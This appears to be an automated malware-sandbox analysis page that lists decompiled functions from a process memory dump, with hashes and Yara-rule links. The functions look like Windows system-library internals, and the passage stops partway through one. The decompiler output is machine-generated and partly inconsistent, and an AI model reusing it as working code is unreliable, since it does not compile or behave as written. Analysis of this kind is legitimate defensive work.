Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66db48c6b656464d62e0938d4fe8ff58526bdf1edbcdc356b0bd8edb7da9f246
Instruction ID: de968a38da38722b966a277c4f7cee999906823107b197dee7a4912fc67e2140
Opcode Fuzzy Hash: 66db48c6b656464d62e0938d4fe8ff58526bdf1edbcdc356b0bd8edb7da9f246
Instruction Fuzzy Hash: 52318EF1620205AFD721CF1ADCA0F6E77F9EB85712F14899AE015D7240EB78AD01CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 04A761A0, Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E04A761A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E04A75E50(0x4a267cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E04B19D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E04A4F7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}

0x04a761b3
0x04a761b5
0x04a761bd
0x04a761c3
0x04a761c7
0x04a761d2
0x04a761ff
0x04a761ff
0x04a76201
0x04a76207
0x04a76207
0x04a761d4
0x04a761d9
0x00000000
0x00000000
0x04a761df
0x04a761e2
0x00000000
0x00000000
0x04a761e6
0x04a761e8
0x04a761ee
0x04a761ee
0x04a761f9
0x04ab762f
0x04ab7632
0x04ab7635
0x04ab7639
0x04ab7640
0x04ab766e
0x04ab7675
0x00000000
0x00000000
0x04ab7681
0x04ab7689
0x04ab768d
0x04ab7691
0x04ab7695
0x04ab7699
0x04ab76af
0x04ab76b5
0x04ab76b7
0x04ab76b7
0x04ab76d7
0x04ab76dc
0x00000000
0x04ab76dc
0x04ab76a2
0x04ab76a9
0x04ab7651
0x04ab7653
0x04ab7653
0x04ab7656
0x04ab7656
0x00000000
0x04ab7656
0x04ab7644
0x04ab7646
0x04ab7648
0x04ab7648
0x00000000
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a41ce4a785b02ef44333f856c428a9d0dd0828ec63b64e20ccad72d1a4630691
Instruction ID: 2f9d4cc38bd40d9b7d2aa65aa75fcca0a62c49f7fc885ef8b4555cbabd1cd459
Opcode Fuzzy Hash: a41ce4a785b02ef44333f856c428a9d0dd0828ec63b64e20ccad72d1a4630691
Instruction Fuzzy Hash: EB31AF716067018FD360DF09C910B66B7E8FB88B10F04496DE9949B352E7B0F804CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 04A4AA16, Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E04A4AA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x4b3d360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x4b37b9c; // 0x0
					_t53 = L04A64620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E04A8B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E04A8F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L04A56C59(_t53, _t51, _t58) != 0) {
							_t28 = E04A75E50(0x4a2c338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E04A7B230(_v32, _v28, 0x4a2c2d8, 1,  &_v24);
								_t28 = E04A4F7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}

0x04a4aa25
0x04a4aa29
0x04a4aa2d
0x04a4aa30
0x04a4aa37
0x04a4aa3c
0x04aa4458
0x04aa4458
0x04aa4472
0x04aa4474
0x04aa4476
0x04a4aa64
0x04a4aa74
0x04aa447c
0x04aa4483
0x04aa4492
0x04a4aa52
0x04a4aa54
0x04a4aa5e
0x04aa44a8
0x04aa44ad
0x04aa44af
0x04aa44b6
0x04aa44b6
0x04aa44b9
0x04aa44bc
0x04aa44cd
0x04aa44d3
0x04aa44d6
0x04aa44e1
0x04aa44e1
0x04aa44e6
0x04aa44e8
0x04aa44fb
0x04aa44fb
0x04aa44e8
0x00000000
0x04a4aa5e
0x04aa4476
0x04a4aa42
0x04a4aa46
0x04a4aa48
0x04a4aa4c
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19261cbaa4d570b4a61204e7203f93aa965f85665056a8f916ffb7bd648e254e
Instruction ID: 187cb2d98080781b73965c06c6e2d5835cb97533633cc7726bfb8335de7195a2
Opcode Fuzzy Hash: 19261cbaa4d570b4a61204e7203f93aa965f85665056a8f916ffb7bd648e254e
Instruction Fuzzy Hash: 8E31C571A00219ABDB10AF64CE41ABFB7B9FF48704F41446AF905DB150E774BD11DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 04A88EC7, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E04A88EC7(void* __ecx, void* __edx) {
				signed int _v8;
				signed int* _v16;
				intOrPtr _v20;
				signed int* _v24;
				char* _v28;
				signed int* _v32;
				intOrPtr _v36;
				signed int* _v40;
				signed int* _v44;
				signed int* _v48;
				intOrPtr _v52;
				signed int* _v56;
				signed int* _v60;
				signed int* _v64;
				intOrPtr _v68;
				signed int* _v72;
				char* _v76;
				signed int* _v80;
				signed int _v84;
				signed int* _v88;
				intOrPtr _v92;
				signed int* _v96;
				intOrPtr _v100;
				signed int* _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				signed int* _v152;
				char _v156;
				signed int* _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x4b3d360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E04A74E70(0x4b386e4, 0x4a89490, 0, 0);
					if( *0x4b353e8 > 5 && E04A88F33(0x4b353e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x4b353e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x4b353e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x4a2bc46;
						_t48 = E04AC7B9C(0x4b353e8, 0x4a2bc46, _t67, 0x4b353e8, _t70,  &_v140);
					}
				}
				return E04A8B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}

0x04a88ec7
0x04a88ed9
0x04a88edc
0x04a88ee6
0x04a88ee9
0x04a88eee
0x04a88efc
0x04a88f08
0x04ac1349
0x04ac1353
0x04ac135d
0x04ac1366
0x04ac136f
0x04ac1375
0x04ac137c
0x04ac1385
0x04ac1390
0x04ac1391
0x04ac139c
0x04ac139d
0x04ac13a6
0x04ac13ac
0x04ac13b2
0x04ac13b5
0x04ac13bc
0x04ac13bf
0x04ac13c2
0x04ac13c5
0x04ac13c8
0x04ac13cb
0x04ac13ce
0x04ac13d1
0x04ac13d4
0x04ac13d7
0x04ac13da
0x04ac13dd
0x04ac13e0
0x04ac13e3
0x04ac13e6
0x04ac13e9
0x04ac13f6
0x04ac1400
0x04ac1400
0x04a88f08
0x04a88f32

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b8c7323480aadc6bde5b9f5a64a9262b8ae77dcf89c2c10b37d63a1ef34b142
Instruction ID: ee28ce878bf1d86643decbe5fd6e76ca55fc498c3af51afaf52b34159d301acc
Opcode Fuzzy Hash: 8b8c7323480aadc6bde5b9f5a64a9262b8ae77dcf89c2c10b37d63a1ef34b142
Instruction Fuzzy Hash: 6D41A4B1D002189FDB20DF9AD980AEDFBF4FB48314F5041AEE519A7241DB746A84CF50

Uniqueness

Uniqueness Score: -1.00%

Function 04A84A2C, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E04A84A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x4b3d360 ^ _t62;
				_v8 =  *0x4b3d360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E04A62280(_t26, 0x4b38608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E04A5FFB0(_t41, _t51, 0x4b38608);
						L2:
						 *0x4b3b1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E04A8B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E04A62280(_t28, 0x4b38608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E04A5FFB0(_t42, _t53, 0x4b38608);
							if(_t53 != 0) {
								L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E04A5FFB0(_t41, _t51, 0x4b38608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}

0x04a84a2c
0x04a84a34
0x04a84a3c
0x04a84a3e
0x04a84a48
0x04a84a4b
0x04a84a4d
0x04a84a51
0x04a84a9c
0x00000000
0x00000000
0x04a84aa3
0x04a84aa8
0x04a84aad
0x04a84ab1
0x04a84ade
0x04a84ae3
0x04a84a5a
0x04a84a62
0x04a84a6a
0x04a84a6e
0x04abf203
0x04a84a84
0x04a84a88
0x04a84a89
0x04a84a8a
0x04a84a95
0x04a84a95
0x04a84a79
0x04a84a80
0x04a84af2
0x04a84af4
0x04a84af9
0x04a84aff
0x04a84b01
0x04a84b03
0x04a84b08
0x04abf20a
0x04abf212
0x04abf216
0x04abf216
0x04a84b08
0x04a84b13
0x04a84b1a
0x04abf229
0x04abf229
0x04a84b1a
0x04a84a82
0x00000000
0x04a84a82
0x04a84ab7
0x04a84acd
0x04a84acd
0x04a84ad5
0x04a84ada
0x00000000
0x04a84ada
0x04a84ac2
0x04a84acb
0x00000000
0x00000000
0x00000000
0x04a84acb
0x04a84a53
0x04a84a53
0x04a84a58
0x00000000

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea63a56b216bbe7709e718cca76c2cc3ddd988d56817d6b2d2a9c04d0d33810d
Instruction ID: 55aa26fd3cd63e25d70c6fef5f1dac6f32511616dbe0b1343a7142083f2b322f
Opcode Fuzzy Hash: ea63a56b216bbe7709e718cca76c2cc3ddd988d56817d6b2d2a9c04d0d33810d
Instruction Fuzzy Hash: 1931FF322056129FD721BF64CA84B2AFBE4FB88B15F84486DF8564B650E774F804CB96

Uniqueness

Uniqueness Score: -1.00%

Function 04A7E730, Relevance: .1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E04A7E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E04A89670() < 0) {
					L04A9DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x4b37b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L04A64620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M04A7E810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

0x04a7e730
0x04a7e736
0x04a7e738
0x04a7e73d
0x04a7e73e
0x04a7e740
0x04a7e749
0x04a7e765
0x04a7e76a
0x04a7e76b
0x04a7e76c
0x04a7e76d
0x04a7e76e
0x04a7e76f
0x04a7e775
0x04a7e777
0x04a7e77e
0x04abb675
0x04a7e784
0x04a7e784
0x04a7e789
0x04a7e7a8
0x04a7e7ac
0x04a7e807
0x04a7e7ae
0x04a7e7ae
0x04a7e7b1
0x04a7e7b4
0x04a7e7b9
0x04a7e7c0
0x04a7e7c4
0x04a7e7ca
0x04a7e7cc
0x00000000
0x04a7e7d3
0x04a7e7d6
0x00000000
0x00000000
0x04a7e7ff
0x04a7e802
0x00000000
0x00000000
0x04a7e7f9
0x04a7e7fc
0x00000000
0x00000000
0x04a7e7f3
0x04a7e7f6
0x00000000
0x00000000
0x04a7e7ed
0x04a7e7f0
0x00000000
0x00000000
0x04a7e7e7
0x04a7e7ea
0x00000000
0x00000000
0x04abb685
0x04abb688
0x00000000
0x00000000
0x04abb682
0x00000000
0x00000000
0x04a7e7cc
0x04a7e7d9
0x04a7e7dc
0x04a7e7de
0x04a7e7de
0x04a7e7ac
0x04a7e7e4
0x04a7e74b
0x04a7e751
0x04a7e759
0x04a7e761
0x04a7e761

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19894be6e44b994fb8688d6d1fa7573361aea5e2e6d9b7b3bf9aca37b22eeb70
Instruction ID: ef0c077c8310699536344f66e2a3b4a605466f416c70ff8290711d2e32c79b72
Opcode Fuzzy Hash: 19894be6e44b994fb8688d6d1fa7573361aea5e2e6d9b7b3bf9aca37b22eeb70
Instruction Fuzzy Hash: 24318DB5A14249EFD714CF18C841B9AB7E8FB19314F1482AAF904CB341E635EC80CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04A7BC2C, Relevance: .1, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E04A7BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x4b36100; // 0x33
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E04A62280(0xd, 0x1780f1a0);
				_t41 =  *0x4b360f8; // 0x0
				if(_t41 != 0) {
					 *0x4b360f8 =  *_t41;
					 *0x4b360fc =  *0x4b360fc + 0xffff;
				}
				E04A5FFB0(_t41, 0x800, 0x1780f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x4b360f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L04A64620(0x4b36100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x4b36100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}

0x04a7bc36
0x04a7bc42
0x04a7bc45
0x04a7bc4a
0x04a7bd35
0x00000000
0x00000000
0x00000000
0x00000000
0x04a7bc50
0x04a7bc50
0x04a7bc58
0x04a7bc5a
0x04a7bc60
0x00000000
0x00000000
0x04aba4f2
0x04aba4f6
0x00000000
0x00000000
0x00000000
0x04aba4fc
0x04a7bc79
0x04a7bc7e
0x04a7bc86
0x04a7bd16
0x04a7bd20
0x04a7bd20
0x04a7bc8d
0x04a7bc94
0x04a7bcbd
0x04a7bcca
0x04a7bccb
0x04a7bccc
0x04a7bccd
0x04a7bcce
0x04a7bcd4
0x04a7bcea
0x04a7bcee
0x04a7bcf2
0x04a7bd00
0x04a7bd04
0x00000000
0x04a7bc96
0x04a7bcab
0x04a7bcaf
0x04a7bd2c
0x04a7bd2c
0x04a7bd09
0x00000000
0x04a7bd09
0x04a7bcb1
0x04a7bcb5
0x04a7bcbb
0x00000000
0x00000000
0x00000000
0x04a7bcbb

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a92e780c3ceeeffc0ed5556682b593097c1b3b76a9b3337906f6979d9bf0781
Instruction ID: 6e4ed3624b45316e96453594574a85be2ab3ed364560dc6ab105ecd6a4bf739f
Opcode Fuzzy Hash: 4a92e780c3ceeeffc0ed5556682b593097c1b3b76a9b3337906f6979d9bf0781
Instruction Fuzzy Hash: 2B31F1B2A00605ABDB21DF69C8C17AA77B4EB0831AF008075EC44DF202E638FD058BA0

Uniqueness

Uniqueness Score: -1.00%

Function 04A71DB5, Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E04A71DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E04A6F460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L04A64620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E04A6F460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}

0x04a71dc2
0x04a71dc5
0x04a71dc7
0x04a71dcc
0x04a71dce
0x04a71dd6
0x04a71ddf
0x04a71de0
0x04a71de1
0x04a71de5
0x04a71de8
0x04a71def
0x04a71df0
0x04a71df6
0x04a71df7
0x04a71dfe
0x04a71e1a
0x00000000
0x00000000
0x04a71e0b
0x04a71e12
0x04a71e12
0x04a71e00
0x04a71e00
0x04a71e05
0x04a71e1e
0x04a71e23
0x04ab570f
0x04ab5713
0x00000000
0x00000000
0x04ab5719
0x04ab5719
0x04a71e2c
0x04a71e2d
0x04a71e2e
0x04a71e2f
0x04a71e31
0x04a71e32
0x04a71e35
0x04a71e3d
0x04ab5723
0x04ab573d
0x04ab573d
0x00000000
0x04ab5723
0x04a71e49
0x04a71e4e
0x04a71e4e
0x04a71e09
0x00000000

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction ID: 0b16d040e94af169367528db591aaf434670e05e1049d57e40d5fc884dfabb89
Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction Fuzzy Hash: 0C216B72A00219AFD721CF99CD80EAABBBDEF85A84F254055E90597310DA34BE01DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04A49100, Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E04A49100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x4b1f6e8);
				E04A9D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E04B188F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E04A9D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x4b386c0; // 0xdc07b0
